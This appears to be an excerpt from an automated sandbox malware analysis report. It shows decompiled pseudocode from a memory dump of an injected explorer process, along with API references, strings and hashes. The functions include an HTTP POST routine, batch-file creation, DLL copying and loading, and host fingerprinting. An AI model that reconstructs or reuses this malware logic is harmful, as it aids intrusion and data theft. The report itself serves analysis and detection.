							_t145 =  *0xf8971c; // 0x547bc98
							_v12 = 0x493e0;
							 *((intOrPtr*)(_t145 + 0x14))(_t211, 5,  &_v12, _t207);
							_t148 =  *0xf8971c; // 0x547bc98
							_v12 =  *((intOrPtr*)(_t148 + 0x1c))(_t211,  &_v392, _v96, 0, 0, 3, 0, 0);
							if(_a28 != 0) {
								E00F5CEF9(_t204, _a28);
								_pop(_t198);
							}
							if(_v12 != 0) {
								if(_v108 == _t207) {
									_v16 = 0x8484f700;
								}
								_t152 =  *0xf8971c; // 0x547bc98
								_v20 =  *((intOrPtr*)(_t152 + 0x20))(_v12, "POST",  &_v648, 0, 0,  &_v60, _v16, 0);
								if(_a28 != 0) {
									E00F5CEF9(_t204, _a28);
									_pop(_t198);
								}
								if(_v20 != 0) {
									if(_v108 == _t207) {
										E00F607A9(_t198, _v20);
									}
									_t155 = E00F62CB7();
									_v16 = _t155;
									_t157 =  *0xf8971c; // 0x547bc98
									_t208 =  *((intOrPtr*)(_t157 + 0x24))(_v20, _v16, E00F5ACD6(_t155), _a8, _a12, 0xe);
									E00F5B9F4( &_v16);
									if(_a28 != 0) {
										E00F5CEF9(_t204, _a28);
									}
									if(_t208 != 0) {
										break;
									} else {
										GetLastError();
										_t181 =  *0xf8971c; // 0x547bc98
										 *((intOrPtr*)(_t181 + 8))(_v20);
										_v20 = 0;
										goto L21;
									}
								} else {
									GetLastError();
									L21:
									_t183 =  *0xf8971c; // 0x547bc98
									 *((intOrPtr*)(_t183 + 8))(_v12);
									_v12 = 0;
									goto L22;
								}
							} else {
								GetLastError();
								L22:
								_t185 =  *0xf8971c; // 0x547bc98
								 *((intOrPtr*)(_t185 + 8))(_t211);
								_t211 = 0;
								goto L23;
							}
						}
						GetLastError();
						L23:
						_v24 = _v24 + 1;
					} while (_v24 < 2);
					if(_v20 != 0) {
						asm("stosd");
						asm("stosd");
						_t210 = _v20;
						_push(0);
						_push( &_v36);
						_push( &_v32);
						_t164 =  *0xf8971c; // 0x547bc98
						_push(0x13);
						_push(_t210);
						_v36 = 8;
						if( *((intOrPtr*)(_t164 + 0xc))() != 0) {
							_t166 = E00F5CE8A( &_v32);
							if(_t166 == 0xc8) {
								 *_a24 = _t210;
								 *_a16 = _t211;
								 *_a20 = _v12;
								return 0;
							}
							_v16 =  ~_t166;
							L30:
							_t172 =  *0xf8971c; // 0x547bc98
							 *((intOrPtr*)(_t172 + 8))(_t210);
							L31:
							if(_v12 != 0) {
								_t177 =  *0xf8971c; // 0x547bc98
								 *((intOrPtr*)(_t177 + 8))(_v12);
							}
							if(_t211 != 0) {
								_t175 =  *0xf8971c; // 0x547bc98
								 *((intOrPtr*)(_t175 + 8))(_t211);
							}
							return _v16;
						}
						GetLastError();
						_v16 = 0xfffffff8;
						goto L30;
					}
					_v16 = 0xfffffffe;
					goto L31;
				}
				_t194 = 0xfffffffc;
				return _t194;
			}

0x00f60aa3
0x00f60abf
0x00f60ac6
0x00f60ac9
0x00f60ad0
0x00f60ad3
0x00f60ad6
0x00f60adc
0x00f60aed
0x00f60af3
0x00f60b05
0x00f60b12
0x00f60b1f
0x00f60b2c
0x00f60b34
0x00f60b3b
0x00f60b3d
0x00f60b45
0x00f60b48
0x00f60b53
0x00f60b5c
0x00f60b67
0x00f60b6a
0x00f60b70
0x00f60b71
0x00f60b7b
0x00f60b82
0x00f60b85
0x00f60b8e
0x00f60b8f
0x00f60b92
0x00f60b9c
0x00f60ba6
0x00f60ba9
0x00f60bb3
0x00f60bbe
0x00f60bc7
0x00f60bcb
0x00f60bda
0x00f60bdd
0x00f60bdf
0x00f60be4
0x00f60be7
0x00f60bed
0x00f60bf5
0x00f60bfd
0x00f60c04
0x00f60c0c
0x00f60c14
0x00f60c1b
0x00f60c23
0x00f60c2b
0x00f60c32
0x00f60c45
0x00f60c4e
0x00f60c54
0x00f60c59
0x00f60c5e
0x00f60c5e
0x00f60c62
0x00f60c72
0x00f60c74
0x00f60c74
0x00f60c8c
0x00f60c9c
0x00f60ca2
0x00f60ca7
0x00f60cac
0x00f60cac
0x00f60cb0
0x00f60cbd
0x00f60cc2
0x00f60cc7
0x00f60ccb
0x00f60cd3
0x00f60ce4
0x00f60cef
0x00f60cf4
0x00f60cfc
0x00f60d01
0x00f60d06
0x00f60d09
0x00000000
0x00f60d0b
0x00f60d0b
0x00f60d14
0x00f60d19
0x00f60d1c
0x00000000
0x00f60d1c
0x00f60cb2
0x00f60cb2
0x00f60d1f
0x00f60d22
0x00f60d27
0x00f60d2a
0x00000000
0x00f60d2a
0x00f60c64
0x00f60c64
0x00f60d2d
0x00f60d2d
0x00f60d33
0x00f60d36
0x00000000
0x00f60d36
0x00f60c62
0x00f60bcd
0x00f60d38
0x00f60d38
0x00f60d3b
0x00f60d48
0x00f60d58
0x00f60d59
0x00f60d5a
0x00f60d5d
0x00f60d61
0x00f60d65
0x00f60d66
0x00f60d6b
0x00f60d6d
0x00f60d6e
0x00f60d7a
0x00f60d8e
0x00f60d98
0x00f60dd0
0x00f60dd5
0x00f60dda
0x00000000
0x00f60ddc
0x00f60d9c
0x00f60d9f
0x00f60d9f
0x00f60da5
0x00f60da8
0x00f60dab
0x00f60db0
0x00f60db5
0x00f60db5
0x00f60dba
0x00f60dbc
0x00f60dc2
0x00f60dc2
0x00000000
0x00f60dc5
0x00f60d7c
0x00f60d82
0x00000000
0x00f60d82
0x00f60d4a
0x00000000
0x00f60d4a
0x00f60ba0
0x00000000

APIs

memset.MSVCRT ref: 00F60ADC
memset.MSVCRT ref: 00F60AF3
memset.MSVCRT ref: 00F60B48
GetLastError.KERNEL32(?,?,?,?,?,?,00000000,00000000,000007D0), ref: 00F60BCD

Strings

POST, xrefs: 00F60C91

Memory Dump Source

Source File: 00000004.00000002.514032061.0000000000F50000.00000040.00000001.sdmp, Offset: 00F50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_f50000_explorer.jbxd

Yara matches

Similarity

API ID: memset$ErrorLast
String ID: POST
API String ID: 2570506013-1814004025
Opcode ID: fdd492df4f4a6509acb01c30981daa8d51592c6d70ed7e3e152ba1099e0c37a8
Instruction ID: 2395e71b8610967d21d924ffda5817c2cd38d7ad8348c40150bb4ed0d7224991
Opcode Fuzzy Hash: fdd492df4f4a6509acb01c30981daa8d51592c6d70ed7e3e152ba1099e0c37a8
Instruction Fuzzy Hash: E6B137B2D00209AFDB10DF98DC88AEEBBB8FF08315F144169F505E6261DB749A45EF61

Uniqueness

Uniqueness Score: -1.00%

Function 00F57BA9, Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 150
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E00F57BA9(void* __eflags, void* __fp0, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				signed int _v12;
				char _v16;
				char _v20;
				char _v24;
				struct HDC__* _v25;
				char _v40;
				short _v104;
				char _v388;
				void* __edi;
				void* __esi;
				signed int _t30;
				signed int _t32;
				char _t34;
				intOrPtr _t43;
				void* _t44;
				intOrPtr _t45;
				intOrPtr _t47;
				intOrPtr _t52;
				intOrPtr _t56;
				signed int _t57;
				intOrPtr _t62;
				intOrPtr _t64;
				struct HDC__* _t67;
				void* _t74;
				void* _t77;
				char _t78;
				void* _t79;
				void* _t80;
				intOrPtr _t81;
				void* _t83;
				void* _t88;

				_t88 = __fp0;
				_t67 = 0;
				_v12 = 0;
				_v24 = 0;
				_t30 = E00F5B31F(__eflags, L"bat");
				_v8 = _t30;
				if(_t30 != 0) {
					_t78 = E00F5AC58(0x400);
					_t32 =  &_v388;
					_v16 = _t78;
					__imp__GetCPInfoExA(0x22, 0x4c, _t32, _t74, _t77);
					__eflags = _t78;
					if(_t78 != 0) {
						_t34 = E00F62CB7();
						_push(_a8);
						_v20 = _t34;
						E00F5CFBA(0x400, _t78, _t34, _a4);
						E00F5B9F4( &_v20);
						E00F5D25A(_v8, _t78, E00F5ACD6(_t78));
						E00F5AB81( &_v16, 0xffffffff);
						_t43 = E00F5BAA0(_v8,  &_v24, 0, 1);
						__eflags = _t43;
						if(_t43 != 0) {
							_t79 = 0;
							__eflags = 0;
							while(1) {
								_t44 = E00F5D231(_a8);
								__eflags = _t44 - _t67;
								if(_t44 != _t67) {
									break;
								}
								_t64 =  *0xf89740; // 0x547f6c8
								 *((intOrPtr*)(_t64 + 0xb4))(0x64);
								_t79 = _t79 + 1;
								__eflags = _t79 - 0xc8;
								if(_t79 < 0xc8) {
									continue;
								}
								L11:
								Arc(_t67, 0x28, 0x12, 0x42, 0x33, 0x12, 0x14, 0x23, 0x55);
								L12:
								BitBlt(_t67, 0x34, 0x1f, 0x62, 0x26, _t67, 0x4e, 0x4c, 0x42);
								_t80 = 0;
								__eflags = 0;
								while(1) {
									_t52 = E00F5B15C(_v8, __eflags, _t88);
									__eflags = _t52;
									if(_t52 != 0) {
										break;
									}
									_t62 =  *0xf89740; // 0x547f6c8
									 *((intOrPtr*)(_t62 + 0xb4))(0x1f4);
									_t80 = _t80 + 1;
									__eflags = _t80 - 0x14;
									if(__eflags < 0) {
										continue;
									}
									break;
								}
								E00F5AB81( &_v8, 0xfffffffe);
								GetLastError();
								_t56 = E00F5ACD6("9L wp eOsv dvRa6Qv 8Ijku RgR5sxkWoHY5XtJjQTbv 8l gwwrL.0AO1ly,PfwCX.MXtcQFWKIjSU81pqjHDQ2NmdZwWyg 6vkwP8Zc7WnvnoRz8me2ahCXtw 4 gRWfzNR08q1l 3 6UvuKytdKbm6UmLqLsB6hbte,7bAJt32vAPw8A6z5kS fCYp3MY4VIYaKugki2FFl gWr ,6j7ee3h90Q9l7UjLCsirEUO1o5O4oZR2XfVq2bespbqM3x6YlggsXg94X wDt5Trkn2TFnFigNj wlgMMGsC,LI62UoZ3BA7 YXGLu34lkRCbGek HD HaVE,E2lCel1B  .aJux8HuI71s3S,2aQtp u p.,3WV8hyhJv.p 7xoPBMo8pRUCfqxMso28WdDumqRAr8b5OUNsRinhvMHFO1IqkwkZwong4m7sV54wvkQEFmEJPn,rcyxTftVM9Y vrhI5UZFrHAQ5e 6 q,052FrRkrhc,ZsO7 R1b5nxIGQR13v UqeMCBtR zHzWYQWFt pH6Y6,r0Vo0Wa9.dLPc1g16Cv8N OJD2YFhvEboUL44ma P vFYR1xQj6lka1j8vdSIYRXyxmoXHTf XQqcCyL1wTzo8ec,l.3roeAg,PsMnNe7FWM,yXqwxn39TpOq1uV2Askfa T, Xj  bhLzVKDxgd.TlQjw2QGCu Y7 ZEib9scWYmMN1yfDTdm20dTQaPOZlVVwB7h7HSloGdDS9jkP,Widajfy9hWVfwT2h46WjnGO7f FKtHxXyv qG8GYVY6ckOG jV1z5bWdFNTp6V4TJlwnJwHVOhT9LKpWqN1jxKnB5fsaSavro pxNp1Ens aIZGPnW8vnDH7M,62mqKHOikK.My0SKTK93JQEsK..JKrg1yEttpl zs55 Mp4rQsb7iGXZppe6rLI0B YH6cohAeX8X4UNEyoekX4c,5FcYOM kLTgHWWT1CFBB9Sb cX2kG  .PrTyLgWErv7 gYeBCUKsXO7mUtvCMUbLJGm8gM  a.on13QWnLN z,jdWcCKeTtI0WmxqpkvBHni8b8.9p,3nQhKanSuYNZuF8Um S31f5ikzdyTY6J2enjca10X7OOII n8pNZ,itz eQsJ2k zsw");
								_t81 = 0xf;
								__eflags = _t56 - _t81;
								if(_t56 <= _t81) {
									_t81 = _t56;
								}
								_v25 = _t67;
								__eflags = _t81;
								if(_t81 == 0) {
									L19:
									_t57 = _v12;
									L20:
									return _t57;
								} else {
									do {
										_t24 = _t67 + 0x42; // 0x42
										 *((char*)(_t83 + _t67 - 0x24)) = _t24;
										MultiByteToWideChar(0, 0,  &_v40, 0xffffffff,  &_v104, 0x20);
										_t67 =  &(_t67->i);
										__eflags = _t67 - _t81;
									} while (_t67 < _t81);
									goto L19;
								}
							}
							_t45 =  *0xf89740; // 0x547f6c8
							 *((intOrPtr*)(_t45 + 0x30))(_t44);
							_t47 =  *0xf89740; // 0x547f6c8
							 *((intOrPtr*)(_t47 + 0xb4))(0x3e8);
							goto L11;
						}
						_v12 = _v12 | 0xffffffff;
						goto L12;
					}
					_t57 = _t32 | 0xffffffff;
					goto L20;
				}
				return _t30 | 0xffffffff;
			}

0x00f57ba9
0x00f57bb3
0x00f57bba
0x00f57bbd
0x00f57bc0
0x00f57bc6
0x00f57bcb
0x00f57be3
0x00f57be5
0x00f57bf0
0x00f57bf3
0x00f57bf9
0x00f57bfb
0x00f57c0a
0x00f57c0f
0x00f57c12
0x00f57c19
0x00f57c21
0x00f57c31
0x00f57c3c
0x00f57c4b
0x00f57c53
0x00f57c55
0x00f57c5d
0x00f57c5d
0x00f57c5f
0x00f57c62
0x00f57c68
0x00f57c6a
0x00000000
0x00000000
0x00f57c6c
0x00f57c73
0x00f57c79
0x00f57c7a
0x00f57c80
0x00000000
0x00000000
0x00f57c9d
0x00f57cae
0x00f57cb4
0x00f57cc4
0x00f57cca
0x00f57cca
0x00f57ccc
0x00f57ccf
0x00f57cd4
0x00f57cd6
0x00000000
0x00000000
0x00f57cd8
0x00f57ce2
0x00f57ce8
0x00f57ce9
0x00f57cec
0x00000000
0x00000000
0x00000000
0x00f57cec
0x00f57cf4
0x00f57cfb
0x00f57d06
0x00f57d0e
0x00f57d0f
0x00f57d11
0x00f57d13
0x00f57d13
0x00f57d15
0x00f57d18
0x00f57d1a
0x00f57d3e
0x00f57d3e
0x00f57d41
0x00000000
0x00f57d1c
0x00f57d1c
0x00f57d1e
0x00f57d21
0x00f57d33
0x00f57d39
0x00f57d3a
0x00f57d3a
0x00000000
0x00f57d1c
0x00f57d1a
0x00f57c85
0x00f57c8a
0x00f57c8d
0x00f57c97
0x00000000
0x00f57c97
0x00f57c57
0x00000000
0x00f57c57
0x00f57bfd
0x00000000
0x00f57bfd
0x00000000

APIs

GetCPInfoExA.KERNEL32(00000022,0000004C,?), ref: 00F57BF3

Strings

9L wp eOsv dvRa6Qv 8Ijku RgR5sxkWoHY5XtJjQTbv 8l gwwrL.0AO1ly,PfwCX.MXtcQFWKIjSU81pqjHDQ2NmdZwWyg 6vkwP8Zc7WnvnoRz8me2ahCXtw 4 gRWfzNR08q1l 3 6UvuKytdKbm6UmLqLsB6hbte,7bAJt32vAPw8A6z5kS fCYp3MY4VIYaKugki2FFl gWr ,6j7ee3h90Q9l7UjLCsirEUO1o5O4oZR2XfVq2bespbqM3x6, xrefs: 00F57D01
bat, xrefs: 00F57BB5

Memory Dump Source

Source File: 00000004.00000002.514032061.0000000000F50000.00000040.00000001.sdmp, Offset: 00F50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_f50000_explorer.jbxd

Yara matches

Similarity

API ID: Info
String ID: 9L wp eOsv dvRa6Qv 8Ijku RgR5sxkWoHY5XtJjQTbv 8l gwwrL.0AO1ly,PfwCX.MXtcQFWKIjSU81pqjHDQ2NmdZwWyg 6vkwP8Zc7WnvnoRz8me2ahCXtw 4 gRWfzNR08q1l 3 6UvuKytdKbm6UmLqLsB6hbte,7bAJt32vAPw8A6z5kS fCYp3MY4VIYaKugki2FFl gWr ,6j7ee3h90Q9l7UjLCsirEUO1o5O4oZR2XfVq2bespbqM3x6$bat
API String ID: 1807457897-3769205469
Opcode ID: 9ce0d6726daa5b22de9e25080a58ebae608e50a20d1e48be9b0257c09a915b35
Instruction ID: 960a5724c6fe56790813e47dd2de0ba8b04c16bbe353c887ad7ed38da20ec1c9
Opcode Fuzzy Hash: 9ce0d6726daa5b22de9e25080a58ebae608e50a20d1e48be9b0257c09a915b35
Instruction Fuzzy Hash: A141EB71904319BBD721BBA4DC8AFAD7768AF04721F100261FF15FA0D2D7748A48A751

Uniqueness

Uniqueness Score: -1.00%

Function 00F5E90C, Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 108
filelibraryCOMMON

Download Yara Rule

C-Code - Quality: 59%

			E00F5E90C(void* __esi) {
				WCHAR* _v8;
				char _v12;
				void _v140;
				intOrPtr _t15;
				char _t16;
				intOrPtr _t22;
				intOrPtr _t28;
				WCHAR* _t30;
				struct HINSTANCE__* _t32;
				intOrPtr _t40;
				void* _t41;
				signed char _t43;
				char* _t44;
				intOrPtr _t49;
				void* _t54;
				char* _t55;
				intOrPtr _t67;
				intOrPtr _t68;

				_t54 = __esi;
				_t15 =  *0xf89720; // 0xf90000
				_t43 =  *(_t15 + 0x1898);
				if(_t43 == 0x100 ||  *((intOrPtr*)(_t15 + 4)) >= 0xa && (_t43 & 0x00000004) != 0) {
					_t16 = E00F62CCE(_t43, 0xa0e);
					_t49 =  *0xf89720; // 0xf90000
					_v12 = _t16;
					E00F5CE46( &_v140, 0x40, L"%08x", E00F61785(0, _t49 + 0xb0, E00F5ACD6(_t49 + 0xb0)));
					_t22 =  *0xf89720; // 0xf90000
					_t44 = L"SysWOW64";
					if( *((intOrPtr*)(_t22 + 0xa8)) == 0) {
						_t44 = L"System32";
					}
					_push(_t54);
					_push(0);
					_push(_v12);
					_t55 = "\\";
					_push(_t55);
					_push(_t44);
					_push(_t55);
					_v8 = E00F5B60A(_t22 + 0x1020);
					E00F5BA86( &_v12);
					_push(0);
					_push(L"dll");
					_push(".");
					_push( &_v140);
					_t28 =  *0xf89720; // 0xf90000
					_push(_t55);
					_t30 = E00F5B60A(_t28 + 0x122a);
					 *0xf89844 = _t30;
					CopyFileW(_v8, _t30, 0);
					_t32 = LoadLibraryW( *0xf89844);
					 *0xf89840 = _t32;
					if(_t32 == 0) {
						 *0xf897ec = 0;
					} else {
						_push(_t32);
						_push(0xf7b338);
						_t41 = 0x28;
						 *0xf897ec = E00F5F184(_t41);
					}
					E00F5AB81( &_v8, 0xfffffffe);
					memset( &_v140, 0, 0x80);
					_t67 =  *0xf897ec; // 0x0
					if(_t67 != 0) {
						goto L12;
					} else {
						E00F5AB81(0xf89844, 0xfffffffe);
						goto L10;
					}
				} else {
					L10:
					_t68 =  *0xf897ec; // 0x0
					if(_t68 == 0) {
						_t40 =  *0xf8972c; // 0x547f7f0
						 *0xf897ec = _t40;
					}
					L12:
					return 1;
				}
			}

0x00f5e90c
0x00f5e90f
0x00f5e914
0x00f5e929
0x00f5e943
0x00f5e948
0x00f5e955
0x00f5e975
0x00f5e97a
0x00f5e982
0x00f5e98d
0x00f5e98f
0x00f5e98f
0x00f5e994
0x00f5e995
0x00f5e996
0x00f5e999
0x00f5e99e
0x00f5e99f
0x00f5e9a5
0x00f5e9ac
0x00f5e9b3
0x00f5e9b8
0x00f5e9b9
0x00f5e9be
0x00f5e9c9
0x00f5e9ca
0x00f5e9d4
0x00f5e9d6
0x00f5e9e3
0x00f5e9e8
0x00f5e9f4
0x00f5e9fa
0x00f5ea02
0x00f5ea1b
0x00f5ea04
0x00f5ea04
0x00f5ea05
0x00f5ea0c
0x00f5ea14
0x00f5ea14
0x00f5ea27
0x00f5ea39
0x00f5ea41
0x00f5ea47
0x00000000
0x00f5ea49
0x00f5ea50
0x00000000
0x00f5ea56
0x00f5ea57
0x00f5ea57
0x00f5ea57
0x00f5ea5d
0x00f5ea5f
0x00f5ea64
0x00f5ea64
0x00f5ea69
0x00f5ea6e
0x00f5ea6e

APIs

CopyFileW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00F5E9E8
LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00F5E9F4
memset.MSVCRT ref: 00F5EA39

Strings

SysWOW64, xrefs: 00F5E982
dll, xrefs: 00F5E9B9
%08x, xrefs: 00F5E967
System32, xrefs: 00F5E98F, 00F5E99F

Memory Dump Source

Source File: 00000004.00000002.514032061.0000000000F50000.00000040.00000001.sdmp, Offset: 00F50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_f50000_explorer.jbxd

Yara matches

Similarity

API ID: CopyFileLibraryLoadmemset
String ID: %08x$SysWOW64$System32$dll
API String ID: 1089690609-3766923124
Opcode ID: c3280810d03f7d600989b52600ef4b911e0f03c586c8a9ab54cc07b2754927ec
Instruction ID: e6ab1dde51b54ffa9a3798419bc5d2a76111e311c691d45f487825479ec7bb3e
Opcode Fuzzy Hash: c3280810d03f7d600989b52600ef4b911e0f03c586c8a9ab54cc07b2754927ec
Instruction Fuzzy Hash: 8B31E571914308BBDB10EFA4DC4AEFE37A8EB45711F088165FA05E2191DA789544FB51

Uniqueness

Uniqueness Score: -1.00%

Function 00F68312, Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 45
registrywindowCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E00F68312(void* __ecx) {
				int _t17;
				void* _t25;

				 *((intOrPtr*)(_t25 - 0x10773)) =  *((intOrPtr*)(_t25 - 0x10773)) + __ecx;
				 *((intOrPtr*)(__ecx - 1))();
				asm("adc eax, 0xf711d4");
				 *((char*)(_t25 - 9)) = 0;
				 *(_t25 - 0x10c) = 0;
				if(GetVersion() >= 0x80000000 || E00F67EC0() <= 0) {
					_t17 = MessageBoxA(0, _t25 - 0x108, "OpenSSL: FATAL", 0x10);
				} else {
					_t17 = RegisterEventSourceA(0, "OpenSSL");
					 *(_t25 - 0x128) = _t17;
					if( *(_t25 - 0x128) != 0) {
						 *(_t25 - 0x12c) = _t25 - 0x108;
						ReportEventA( *(_t25 - 0x128), 1, 0, 0, 0, 1, 0, _t25 - 0x12c, 0);
						_t17 = DeregisterEventSource( *(_t25 - 0x128));
					}
				}
				return _t17;
			}

0x00f68312
0x00f68318
0x00f6831b
0x00f68323
0x00f68327
0x00f6833c
0x00f683b0
0x00f68347
0x00f6834e
0x00f68354
0x00f68361
0x00f68369
0x00f6838b
0x00f68398
0x00f68398
0x00f6839e
0x00f683b9

APIs

GetVersion.KERNEL32 ref: 00F68331
MessageBoxA.USER32 ref: 00F683B0

Part of subcall function 00F67EC0: GetModuleHandleA.KERNEL32(00000000), ref: 00F67ED1
Part of subcall function 00F67EC0: GetProcAddress.KERNEL32(00000000,_OPENSSL_isservice), ref: 00F67EF0

RegisterEventSourceA.ADVAPI32(00000000,OpenSSL), ref: 00F6834E
ReportEventA.ADVAPI32(00000000,00000001,00000000,00000000,00000000,00000001,00000000,?,00000000), ref: 00F6838B
DeregisterEventSource.ADVAPI32(00000000), ref: 00F68398

Strings

OpenSSL, xrefs: 00F68347
OpenSSL: FATAL, xrefs: 00F683A2

Memory Dump Source

Source File: 00000004.00000002.514032061.0000000000F50000.00000040.00000001.sdmp, Offset: 00F50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_f50000_explorer.jbxd

Yara matches

Similarity

API ID: Event$Source$AddressDeregisterHandleMessageModuleProcRegisterReportVersion
String ID: OpenSSL$OpenSSL: FATAL
API String ID: 3181076751-4224901669
Opcode ID: 45edc8f4dac8657123c1a1de7f03e4cf7905af0edc6fcd2cb5f823e61ef49725
Instruction ID: 891c5cfcf3e2e27ed247052fc5a2fa027dd3cced3d293fedfe4871be337beaa2
Opcode Fuzzy Hash: 45edc8f4dac8657123c1a1de7f03e4cf7905af0edc6fcd2cb5f823e61ef49725
Instruction Fuzzy Hash: D2119234E44318ABE7209B24CC4ABE87774FB08B11F5040C8F68CA92C1DBF199D8AF56

Uniqueness

Uniqueness Score: -1.00%

Function 00F6EB61, Relevance: 10.9, APIs: 2, Strings: 4, Instructions: 425COMMON

Download Yara Rule

Strings

false, xrefs: 00F6EBC1
true, xrefs: 00F6EBB5
%I64d, xrefs: 00F6EBD0
null, xrefs: 00F6EBA9

Memory Dump Source

Source File: 00000004.00000002.514032061.0000000000F50000.00000040.00000001.sdmp, Offset: 00F50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_f50000_explorer.jbxd

Yara matches

Similarity

API ID:
String ID: %I64d$false$null$true
API String ID: 0-4285102228
Opcode ID: f5d91f4e948be62eb50ea32438725c55b9667c9eded2d04a98db134d8161d75d
Instruction ID: 25b3712ce3137dd2d577b10dffd95da14cf304aa3445d532fd58a3f3f3cddf4d
Opcode Fuzzy Hash: f5d91f4e948be62eb50ea32438725c55b9667c9eded2d04a98db134d8161d75d
Instruction Fuzzy Hash: A2D19D7AD00209BFDF20AEA4DD46FEF7B79EF14364F104025F914A6181E7769A10EBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00F59D05, Relevance: 10.9, APIs: 5, Strings: 1, Instructions: 394
windowCOMMON

Download Yara Rule

C-Code - Quality: 74%

			E00F59D05(void* __edx) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v52;
				char _v308;
				void* __edi;
				void* __esi;
				intOrPtr* _t125;
				intOrPtr _t127;
				intOrPtr _t130;
				intOrPtr _t133;
				intOrPtr _t135;
				intOrPtr _t137;
				intOrPtr _t138;
				intOrPtr _t140;
				intOrPtr _t143;
				intOrPtr _t145;
				intOrPtr _t148;
				intOrPtr _t150;
				intOrPtr _t157;
				intOrPtr _t159;
				char _t161;
				char _t166;
				char _t169;
				char _t172;
				intOrPtr _t215;
				char _t217;
				char _t225;
				intOrPtr* _t251;
				void* _t259;
				void* _t260;
				intOrPtr _t262;
				void* _t263;
				void* _t289;
				void* _t290;
				void* _t308;
				void* _t314;
				intOrPtr* _t315;
				intOrPtr* _t316;

				_t125 = E00F5AC58(0xcc);
				_t251 = _t125;
				if(_t251 != 0) {
					 *_t251 = E00F5C373(__edx, 0xb);
					_t127 =  *0xf89720; // 0xf90000
					_push( *(_t127 + 0x98) & 0x0000ffff);
					_push( *(_t127 + 0x96) & 0x0000ffff);
					_push( *(_t127 + 0x94) & 0x0000ffff);
					_push( *((intOrPtr*)(_t127 + 0xc)));
					_push( *(_t127 + 0x9a) & 0x000000ff);
					_push( *((intOrPtr*)(_t127 + 8)));
					_push( *((intOrPtr*)(_t127 + 4)));
					_push("%u.%u.%u.%u.%u.%u.%04x");
					_t308 = 0x3f;
					E00F5CFBA(_t308, _t251 + 4);
					 *((intOrPtr*)(_t251 + 0x44)) = E00F62357( *(_t127 + 0x9a) & 0x000000ff);
					_t130 =  *0xf89720; // 0xf90000
					 *((intOrPtr*)(_t251 + 0x48)) = E00F5B6B3(_t130 + 0x199c);
					_t133 =  *0xf89720; // 0xf90000
					_t315 = _t314 + 0x24;
					 *((intOrPtr*)(_t251 + 0x4c)) = E00F5B6B3( *((intOrPtr*)(_t133 + 0x218)));
					_t135 =  *0xf89720; // 0xf90000
					 *((intOrPtr*)(_t251 + 0x50)) =  *((intOrPtr*)(_t135 + 0x220));
					_t137 =  *0xf89720; // 0xf90000
					if( *((intOrPtr*)(_t137 + 0x21c)) != 0) {
						 *((intOrPtr*)(_t251 + 0x54)) = E00F5B6B3( *((intOrPtr*)(_t137 + 0x21c)));
					}
					_t138 =  *0xf89720; // 0xf90000
					 *((intOrPtr*)(_t251 + 0x90)) =  *((intOrPtr*)(_t138 + 0x1850));
					_t140 =  *0xf89720; // 0xf90000
					 *((intOrPtr*)(_t251 + 0x58)) = E00F5B6B3(_t140 + 0x114);
					_t143 =  *0xf89720; // 0xf90000
					 *((intOrPtr*)(_t251 + 0x5c)) =  *((intOrPtr*)(_t143 + 0x214));
					_t145 =  *0xf89720; // 0xf90000
					 *((intOrPtr*)(_t251 + 0x60)) = ( *(_t145 + 0x9c) & 0x0000ffff) + 1;
					_t148 =  *0xf89720; // 0xf90000
					 *((intOrPtr*)(_t251 + 0x64)) =  *((intOrPtr*)(_t148 + 0x101c));
					_t150 =  *0xf89720; // 0xf90000
					_pop(_t259);
					 *((intOrPtr*)(_t251 + 0x68)) =  *((intOrPtr*)(_t150 + 0x1898));
					 *((intOrPtr*)(_t251 + 0x6c)) = E00F6275A(_t259);
					 *((intOrPtr*)(_t251 + 0x70)) = E00F6217F(_t259);
					 *((intOrPtr*)(_t251 + 0x74)) = GetSystemMetrics(0);
					 *((intOrPtr*)(_t251 + 0x78)) = GetSystemMetrics(1);
					 *((intOrPtr*)(_t251 + 0x7c)) = E00F5A4C5();
					_t157 =  *0xf89720; // 0xf90000
					 *((intOrPtr*)(_t251 + 0x88)) = _t157 + 0x228;
					_t159 =  *0xf89720; // 0xf90000
					 *((intOrPtr*)(_t251 + 0x8c)) = _t159 + 0x1644;
					_t161 = E00F58AF1(_t259, 0x32a);
					_pop(_t260);
					_v44 = _t161;
					_v52 = E00F58AF1(_t260, 0);
					 *_t315 = 0x2a3;
					_v48 = E00F58AF1(_t260);
					 *_t315 = 0x125;
					_v20 = E00F58AF1(_t260);
					 *_t315 = 0x364;
					_v28 = E00F58AF1(_t260);
					 *_t315 = 0x372;
					_t166 = E00F58AF1(_t260);
					_t262 =  *0xf89720; // 0xf90000
					_v40 = _t166;
					E00F5CE46( &_v308, 0x80, _t166,  *((intOrPtr*)(_t262 + 0x218)));
					_t169 = E00F58AF1(_t262, 0xf);
					_t316 = _t315 + 0x14;
					_v12 = _t169;
					_v8 = E00F58AF1(_t262, 0x4a5);
					 *_t316 = 0x297;
					_v16 = E00F58AF1(_t262);
					 *_t316 = 0x343;
					_t172 = E00F58AF1(_t262);
					_pop(_t263);
					_v24 = _t172;
					_v36 = E00F58AF1(_t263, 0xf7);
					 *_t316 = 0x458;
					_v32 = E00F58AF1(_t263);
					 *((intOrPtr*)(_t251 + 0x9c)) = E00F5BC8A(_v44);
					 *((intOrPtr*)(_t251 + 0xa0)) = E00F5BC8A(_v52);
					 *((intOrPtr*)(_t251 + 0xa4)) = E00F5BC8A(_v48);
					 *((intOrPtr*)(_t251 + 0xa8)) = E00F5BC8A(_v20);
					 *((intOrPtr*)(_t251 + 0xac)) = E00F5BC8A(_v28);
